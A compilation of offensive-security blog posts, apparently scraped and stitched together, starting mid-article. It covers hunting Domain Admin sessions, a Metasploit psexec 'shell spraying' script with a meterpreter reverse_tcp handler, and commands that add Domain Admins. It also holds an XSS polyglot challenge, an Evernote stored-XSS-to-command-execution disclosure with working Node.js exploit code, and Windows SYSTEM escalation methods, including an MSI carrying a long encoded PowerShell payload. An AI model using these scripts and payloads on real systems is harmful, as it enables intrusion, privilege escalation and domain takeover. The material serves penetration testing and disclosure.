Some Windows systems still allow users to query for logged in users via the NetBIOS queries. The information can be queried using the native nbtstat tool. The user name is indicated by “<03>” in the nbtstat results.

  1. Below is another quick and dirty Windows command line script that will scan remote systems for active Domain Admins sessions. Note: The script can be ran as a non-domain user.for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i
  2. You can also use the nbtscan tool which runs a little faster. It can be downloaded here. Another basic script example is below.for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

Technique 5: PSExec Shell Spraying Remote Systems for Auth Tokens

Psexec “Shell spraying” is the act of using the Psexec module in Metasploit to install shells (typically meterpreter) on hundreds of systems using shared local administrative credentials. Many pentesters use this method in concert with other Metasploit functionality to identify Domain Admin tokens. This is my least favorite technique, but since a large portion of the pentest community is actively using it I feel that I needed to include it. I like getting shells as much as the next guy, but kicking off 500 hundred of them in a production environment could cause availability issues that clients will be really unhappy with. To be fair, having 500 shells does mean you can scrape data faster, but I still think it creates more risk than value. Regardless, below is the process I have seen a lot of people using:

  1. Install Metasploit 3.5 or greater.
  2. Copy paste script below to a text file and save into the Metasploit directory as psexec_spray.rc. I originally found this script on Jabra’s blog.#Setup Multi Handler to accept multiple incoming connections use multi/handler setg PAYLOAD windows/meterpreter/reverse_tcp setg LHOST 0.0.0.0 setg LPORT 55555 set ExitOnSession false exploit -j -z#Setup Credentials use windows/smb/psexec set SMBUser set SMBPass

    #Setup Domain as local host unless using domain credentials set SMBDomain. #Disable playload handler in psexec modules (using multi handler) set DisablePayloadHandler true #Run Ruby code to scan desired network range using some REX API stuff – range walker #note: could also accept ip addresses from a file by replacing rhosts =”192.168.74.0/24” with rhosts = File.readlines(“c:systems.txt”) require ‘rex/socket/range_walker’ rhosts = “192.168.1.0/24” iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost|      #self allows for execution of commands in msfconsole      self.run_single(“set RHOST #{rhost}”)      #-j-z send the session to the background      self.run_single(“exploit -j -z”) end

  3. Update the smbuser and smbpass parameters.
  4. Issue the following command to run the script. The psexec_spray.rc script will attempt to blindly install meterpreter shells on every system in the 192.168.1.0/24 network using the provided credentials.msfconsole –r psexec_spray.rc
  5. You can then use the Metasploit module token_hunter to identify Domain Admin tokens on each of the shelled systems. I’ve outlined the steps below.
    1. Create a file containing a list of the Domain Admins like so: COMPANYjoe-admin COMPANYbill-admin COMPANYdavid-admin
    2. Load the token_hunter module in the msfconsole msf> load token_hunter
    3. Run token hunter to list the sessions containing Domain Admin tokens. msf> token_hunt_user -f /tmp/domain-admin.txt
  6. Alternatively, you can use the following command to get a list of currently logged in users from each of the shelled system and manually look for Domain Admins.Sessions –s loggedin

What Now?

If you already have a meterpreter session you can use Incognito to impersonate the Domain Admin, or add a new one. Incognito can attempt to add a new Domain Admin blindly by iterating through all of the available authencation tokens on the system. Below are the basic commands to do that in meterpreter.

  1. Load Incognito in your active meterpreter session with the following command:load incongnito
  2. Attempt to add a Domain Admin with the authentication tokens on the system:add_user -h 
    add_group “”Domain Admins”” -h

If you’re interested in creating a new Domain Admin using another option you can use the instructions below:

  1. In the meterpreter console, type the following command to view processes:ps
  2. In the meterpreter console, find a domain admin session and migrate to using the following command:migrate
  3. In the meterpreter console, type the following command get a OS shell:shell
  4. Type the following native Windows command to add a new Domain Admin:net user /add /domain
    net group “Domain Admins” /add /domain

Wrap Up

As you can see there are quite a few options for identifying Domain Admin processes and authentication tokens. I recommend using the low impact options to help prevent availability issues and unhappy clients. I’m sure as time goes on people will come up with better ideas, but until then remember to have fun and hack responsibly.

References

 

XSS Polyglot Challenge v2

( Original text by @filedescriptor )

alert() in more than one context.


What is a XSS Polyglot?

A XSS payload which runs in multiple contexts. For example, '--><svg onload=alert()> can pop alerts in <div class=''--><svg onload=alert()>'></div> and <!--'--><svg onload=alert()>-->. It is useful in testing XSS because it minimizes manual efforts and increases the success rate of blind XSS.

Rules
  • You will be given 20 common contexts in black-box
  • No DOM sinks or external libraries are involved
  • Plain HTML injection with minimum filtering
  • A headless Chrome will try your payload
  • Your payload should run alert() in 2+ contexts
  • Payloads exceeding 1024 characters will always fail
  • Network is disabled
Contexts
<div class="{{payload}}"></div>
<div class='{{payload}}'></div>
<title>{{payload}}</title>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<frameset>{{payload}}</frameset>
<select><option>{{payload}}</option></select>
<script type="text/template">{{payload}}</script>
<!--{{payload}}-->
<iframe src="{{payload}}"></iframe> " → 
<iframe srcdoc="{{payload}}"></iframe> " →  < → 
<script>"{{payload}}"</script> </script → <\/script
<script>'{{payload}}'</script> </script → <\/script
<script>`{{payload}}`</script> </script → <\/script
<script>//{{payload}}</script> </script → <\/script
<script>/*{{payload}}*/</script> </script → <\/script
<script>"{{payload}}"</script> </script → <\/script " → \"

more examples by link

Evernote For Windows Read Local File and Command Execute Vulnerabilities

( Original text by TongQing Zhu@Knownsec 404 Team )

0x00 TL;DR

  1. A stored cross site scripting(XSS) issue was repaired before version 6.15.
  2. If a stored XSS in your note,the javascript code will executed in lastest Evernote for Windows.It mean I can create a stored XSS in version 6.14 and it will always work.
  3. Present mode was created by node webkit,I can control it by stored XSS.
  4. I successfully read «C:\Windows\win.ini» and open calc.exe at last.

0x01 A Stored XSS In Version 6.14

Thanks @sebao,He told me how he found a stored xss in Evernote. 1. Add a picture to your note. 2. Right click and rename this picture,like: " onclick="alert(1)">.jpg 3. open this note and click this picture,it will alert(1)

2018/09/20, Evernote for Windows 6.15 GA released and fix the issue @sebao reported.

In Evernote for Windows 6.15, <,>," were filtered when insert filename,But the note which named by sebao_xss can also alert(1).It mean they are do nothing when the filename output.I can use store XSS again.

0x02 JS Inject In NodeWebKit

Of course, I don’t think this is a serious security problem.So I decided to find other Vulnerabilities like RCE or local file read.

In version 6.14,I rename this picture as " onclick="alert(1)"><script src="http://172.16.4.1:8000/1.js">.jpg for convenience, It allows me load the js file from remote server. Then I installed Evernote for Windows 6.15.

I try some special api,like: evernote.openAttachment,goog.loadModuleFromUrl,but failed.

After failing many times,I decided to browse all files under path C:\\Program Files(x86)\Evernote\Evernote\.I find Evernote has a NodeWebKit in C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit and Present mode will use it.

Another good news is we can execute Nodejs code by stored XSS under Present mode.

0x03 Read Local File & Command Execute

I try to use require('child_process').exec,but fail: Module name "child_process" has not been loaded yet for context.So I need a new way.

Very Lucky,I found this article: How we exploited a remote code execution vulnerability in math.js

I read local file successfully.

//read local file javascript code
alert("Try to read C:\\\\Windows\\win.ini");
try{
  var buffer = new Buffer(8192);
  process.binding('fs').read(process.binding('fs').open('..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini', 0, 0600), buffer, 0, 4096); 
  alert(buffer);
}
catch(err){
  alert(err);
}

But in NodeWebKit environment,It don’t have Object and Array(I don’t know why).So I try to use spawn_sync(I get env from window.process.env):

// command executed
try{
  spawn_sync = process.binding('spawn_sync');
  envPairs = [];
  for (var key in window.process.env) {
    envPairs.push(key + '=' + window.process.env[key]);
  }
  args = [];

  const options = {
    file: 'C:\\\\Windows\\system32\\calc.exe',
    args: args,
    envPairs: envPairs,
    stdio: [
      { type: 'pipe', readable: true, writable: false },
      { type: 'pipe', readable: false, writable: true },
      { type: 'pipe', readable: false, writable: true } 
    ]
  };
  spawn_sync.spawn(options);
}
catch(err){
  alert(err);
}

0x04 Use Share Function

Now,I can read my computer’s file and execute calc.exe.I need to prove that this vulnerability can affect other people. I signed up for a new account *****n4n@gmail.com and shared this note with the new account.

*****n4n@gmail.com can receive some message in Work Chat:

if *****n4n@gmail.com decide to open it and use the Present mode,the Nodejs code will executed.

0x05 Report Timeline

2018/09/27: Find Read Local File and Command Execute Vulnerabilities and reported to security@evernote.com
2018/09/27: Evernote Confirm vulnerabilities
2018/10/15: Evernote fix the vulnerabilities in Evernote For Windows 6.16.1 beta and add my name to Hall of Fame
2018/10/19: request CVE ID:CVE-2018-18524
2018/11/05: After Evernote For Windows 6.16.4 released, Public disclosure

 

Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little on how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as a FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native API’s to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • ReturnToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:

SeImpersonatePrivilege

This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research into the DOQU 2.0 malware I was doing, in which this APT actor was delivering malware packaged within a MSI file.

It turns out that a benefit of launching your code via an MSI are the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:

customaction

This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version=«1.0«?>
<Wix xmlns=«http://schemas.microsoft.com/wix/2006/wi«>
<Product Id=«*« UpgradeCode=«12345678-1234-1234-1234-111111111111« Name=«Example Product Name« Version=«0.0.1« Manufacturer=«@_xpn_« Language=«1033«>
<Package InstallerVersion=«200« Compressed=«yes« Comments=«Windows Installer Package«/>
<Media Id=«1« Cabinet=«product.cab« EmbedCab=«yes«/>
<Directory Id=«TARGETDIR« Name=«SourceDir«>
<Directory Id=«ProgramFilesFolder«>
<Directory Id=«INSTALLLOCATION« Name=«Example«>
<Component Id=«ApplicationFiles« Guid=«12345678-1234-1234-1234-222222222222«>
<File Id=«ApplicationFile1« Source=«example.exe«/>
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id=«DefaultFeature« Level=«1«>
<ComponentRef Id=«ApplicationFiles«/>
</Feature>
<Property Id=»cmdline»>powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABlAGgAQQBGAG8AQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBEAEkAUwBVAEoAbABLAGwAVwAvAE8AZQBBAEkARQA0AEcAQQBoAEYAcAA0ADIAOQBOAGcAdQBMADEAMQAyAHYAZQBlAHYAMQB2ADkAOABZADcASgBTAHEAeQBWADIAdgAwAGwAbQBKADIAUABYAE8ANwBEADcAegB6AEQATQA3AGQAaQBQAGYAbABwAFQANwBTAHIAZwBZADMAVwArAFgAZQBLADEAOABmAGYAdgBtAHIASQA4AEYAWABpAGwAcQBaAHQAMABjAFAAeABRAHIAKwA0AEQAdwBmAGsANwBKAGkASABFAHoATQBNAGoAVgBwAGQAWABUAHoAcwA3AEEASwBpAE8AVwBmADcAYgB0AFYAYQBHAHMAZgBGAEwAVQBLAFEAcQBDAEcAbAA5AGgANgBzACsAdQByADYAdQBSAEUATQBTAFgAeAAzAG0AKwBTAFMAUQBLAFEANwBKADYAWQBwAFMARQBxAHEAYgA4AHAAWQB6AG0AUgBKAEQAegB1ADYAYwBGAHMAYQBYAHkAVgBjAG4AOABtAFcAOAB5AC8AbwBSAFoAWQByAGEAcgBZAG4AdABPAGwASABQAGsATwAvAEYAYQBoADkAcwA0AHgAcABnADMAQQAwAGEAbABtAHYAMwA4AE8AYQB0AE4AegA0AHUAegBmAFAAMQBMAGgARgBtAG8AWgBzADEAZABLAE0AawBxADcAegBDAFcAMQBaAFIAdgBXAG4AegBnAHcAeQA0AGcAYQByAFoATABiAGMARgBEADcAcwByADgAaQBQAG8AWABwAGYAegBRAEQANwBGAEwAZQByAEQAYgBtAG4AUwBKAG4ASABNAG4AegBHAG8AUQBDAGYAdwBKAEkAaQBQAGgASwA4ADgAeAB4AFoAcwBjAFQAZABRAHMARABQAHUAQwAyADgAaAB4AEIAQQBuAEIASQA5AC8AMgAxADMAeABKADEASQB3AGYATQBaAFoAVAAvAGwAQwBuAEMAWQBMADcAeQBKAGQAMABSAFcAQgBkAEUAcwBFAEQAawA0AGcAMQB0AFUAbQBZAGIAMgBIAGYAWQBlAFMAZQB1AEQATwAxAFIAegBaAHAANABMAC8AcQBwAEoANAA2AGcAVgBWAGYAQwBpADAASAAyAFgAawBGAGEAcABjADcARQBTAE4ASAA3ADYAegAyAE0AOQBqAFQAcgBHAHIAdwAvAEoAaABaAG8ATwBQAGIAMgB6AGQAdgAzADcAaQBwAE0ASwBMAHEAZQBuAGcAcQBDAGgAaQBkAFQAUQA5AGoAQQBuAGoAVgBQAGcALwBwAHcAZQA2AFQAVQBzAGcAcABYAFQAZwBWAFMAeQA1ADIATQBNADAAOABpAEkAaABvAE0AMgBVAGEANQAyAEkANgBtAHkAawBaAHUANwBnAHEANQBsADcAMwBMADYAYgBHAFkARQBxAHMAZQBjAEcAeAB1AGwAVgA0AFAAYgBVADQAZABXAGIAZwBsAG0AUQBxAHMANgA2AEkAWABxAGwAUwBpAFoAZABlAEYAMQAyAE4AdQBOAFEAbgB0AFoAMgBQAFYAOQBSAE8AZABhAFcAKwBSAEQAOQB4AEcAVABtAEUAbQBrAC8ATgBlAG8AQgBOAHoAUwBZAEwAeABLAGsAUgBSAGoAdwBzAFkAegBKAHoAeQB2AFIAbgB0AC8AcQBLAHkAbQBkAGYASQA2AEwATQBJAFEATABaAGsATQBJAFEAVQBFAEYAMgB0AFIALwBCAEgAUABPAGoAWgB0AHQAKwBsADYAeQBBAHEAdQBNADgAQwAyAGwAdwBRAGMAMABrAHQAVQA0AFUAdgBFAHQAUABqACsAZABnAGwASwAwAHkASABJAFkANQBwAFIAOQBCAE8AZABrADUAeABTAFMAWQBFAFMAZQBuAEkARAArAGsAeQBSAEsASwBKAEQAOABNAHMAOQAvAGgAZABpAE0AbQBxAFkAMQBEAG0AVwA0ADMAMAAwADYAbwBUAEkANgBzAGMAagArAFUASQByAEkAaABnAFIARAArAGcAeABrAFEAbQAyAEkAVwBzADUARgBUAFcAdABRAGgAeABzADYAawBYAG4AcAAwADkAawBVAHUAcQBwAGcAeAA2AG4AdQB3ADAAeABwAHkAQQBXADkAaQBEAGsAdwBaAHkAMABJAEEAeQBvAE0ARQB0AEwAeABKAFoASABzAFYATQBMAEkAQwBtADAATgBwAE4AeABqADIAbwBKAEMAVABVAGoAagBvAEMASAB2AEUAeQBiADQAQQBNAGwAWAA2AFUAZABZAHgASQB5AGsAVgBKAHgAQQBoAHoAUwBiAGoATQBxAGQAWQBWAEUAaQA0AEoARwBKADIAVQAwAG4AOQBIAG8AcQBUAEsAeQBMAEYAVQB4AFUAawB5AFkAdQBhAFYAcwAzAFUAMgBNAGwAWQA2ADUAbgA5ADMAcgBEADIAcwBVAEkAVABpAGcANgBFAEMAQQBsAGsATgBBAFIAZgBHAFQAZwBrAEgAOABxAG0ARgBFAEMAVgArAGsANgAvAG8AMQBVAEUAegA2AFQAdABzADYANQB0AEwARwBrAFIAYgBXAGkAeAAzAFkAWAAvAEkAYgAxAG8AOAAxAHIARgB1AGIAMQBaAHQASABSAFIAMgA4ADUAZAAxAEEANwBiADMAVgBhAC8ATgBtAGkAMQB5AHUAcwBiADAAeQBwAEwAcwA5ADYAVwB0AC8AMgAyADcATgBiAEgAaQA0AFcASgBXAHYAZgBEAGkAWAB4AHMAbwA5AFkARABMAFMAdwBuADUAWAAxAHcAUQAvAGQAbQBCAHoAbQBUAHIAZgA1AGgAYgArAHcAMwBCAFcATwA3AFgAMwBpAE8ATwA2AG0ANQByAGwAZAB4AHoAZgB2AGkAWgBZAE4AMgBSAHQAVwBCAFUAUwBqAGgAVABxADAAZQBkAFUAYgBHAHgAaQBpAFUAdwB6AHIAZAB0AEEAWgAwAE8ARgBqAGUATgBPAFQAVAB4AEcASgA0ADYATwByAGUAdQBIAGkARgA2AGIAWQBqAEYAbABhAFIAZAAvAGQAdABoAEoAcgB6AEMAMwB0AC8ANAAxAHIATgBlAGQAZgBaAFQAVgByADYAMQBhAGkAOABSAEgAVwBFAHEAbgA3AGQAYQBoAGoAOABkAG0ASQBJADEATgBjAHQANwBBAFgAYwAzAFUAQwBRAEkANgArAEsAagBJAFoATgB5AGUATgBnADIARABBAEcAZwA0AGEAQgBoAHMAMwBGAGwAOQBxAFYANwBvAEgAdgBHAE0AKwBOAGsAVgBXAGkAagA4AEgANABmAGcANwB6AEIAawBDADQAMQBRAHYAbAB0AGsAUAAyAGYARABJAEEALwB5AFoASAAyAEwAcwBIAEcANgA5AGEAcwB1AGMAdQAyAE4AVABlAEkAKwBOADkAagA0AGMAbAB2AEQAUQA0AE0AcwBDAG0AOABmAGcARgBjAEUAMgBDAFIAcAAvAEIAKwBzAE8AdwB4AEoASABGAGUAbQBPAE0ATwBvACsANwBoAHEANABYAEoALwAwAHkAYQBoAFgAbwBxAE8AbQBoAGUARQB2AHMARwBRAE8ATQB3AG4AVgB0AFgAOQBPAEwAbABzAE8AZAAwAFcAVgB2ADQAdQByAFcAbQBGAFgAMABXAHYAVQBoAHMARgAxAGQAMQB6AGUAdAAyAHEAMwA5AFcATgB4ACsAdgBLAHQAOAA3AEkAeQBvAHQAZQBKAG8AcQBPAHYAVwB1ADEAZwBiAEkASQA0AE0ARwBlAC8ARwBuAGMAdQBUAGoATAA5ADIAcgBYAGUAeABDAE8AZQBZAGcAUgBMAGcAcgBrADYAcgBzAGMARgBGAEkANwBsAHcAKwA1AHoARwBIAHEAcgA2ADMASgBHAFgAUgBQAGkARQBRAGYAdQBDAEIAcABjAEsARwBqAEgARwA3AGIAZwBMAEgASwA1AG4ANgBFAEQASAB2AGoAQwBEAG8AaAB6AEMAOABLAEwAMAA0AGsAaABUAG4AZwAyADEANwA1ADAAaABmAFgAVgA5AC8AUQBoAEkAbwBUAHcATwA0AHMAMQAzAGkATwAvAEoAZQBhADYAdwB2AFMAZwBVADQARwBvAHYAYgBNAHMARgBDAFAAYgBYAHcANgB2AHkAWQBLAGMAZQA5ADgAcgBGAHYAUwBHAGgANgBIAGwALwBkAHQAaABmAGkAOABzAG0ARQB4AG4ARwAvADAAOQBkAFUAcQA5AHoAKwBIAEgAKwBqAGIAcgB2ADcALwA1AGgAOQBaAGYAbwBMAE8AVABTAHcASAA5AGEAKwBQAEgARgBmAHkATAAzAHQAdwBnAFkAWQBTAHIAQgAyAG8AUgBiAGgANQBGAGoARgAzAHkAWgBoADAAUQB0AEoAeAA4AFAAawBDAEIAUQBnAHAAcwA4ADgAVABmAGMAWABTAFQAUABlAC8AQgBKADgAVABmAEIATwBiAEwANgBRAGcAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
</Property>
<CustomAction Id=«SystemShell« Execute=«deferred« Directory=«TARGETDIR« ExeCommand=[cmdline] Return=«ignore« Impersonate=«no«/>
<CustomAction Id=«FailInstall« Execute=«deferred« Script=«vbscript« Return=«check«>
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action=«SystemShell« After=«InstallInitialize«></Custom>
<Custom Action=«FailInstall« Before=«InstallFiles«></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
view rawmsigen.wix hosted with ❤ by GitHub

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommandattribute for long Powershell commands).

Another trick which is useful is to ensure that the install fails after our command is executed, which will stop the installer from adding a new entry to «Add or Remove Programs» which is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install
</CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

<InstallExecuteSequence>
  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into a MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:

shell3

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS method

This method of becoming SYSTEM was actually revealed to me via a post from James Forshaw’s walkthrough of how to become «Trusted Installer».

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:

PROC_THREAT_ATTRIBUTE_PARENT_PROCESS

So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

EnableDebugPriv();

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
	GetProcessHeap(),
	0,
	size
);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(
	"C:\\Windows\\system32\\cmd.exe", 
	NULL,
	NULL, 
	NULL, 
	true, 
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, 
	NULL,
	NULL, 
	reinterpret_cast<LPSTARTUPINFOA>(&si), 
	&pi
);

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;
}

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:

parentsystem2

The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESSstructure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208, which differs throughout each version (and potentially service pack) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within a EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

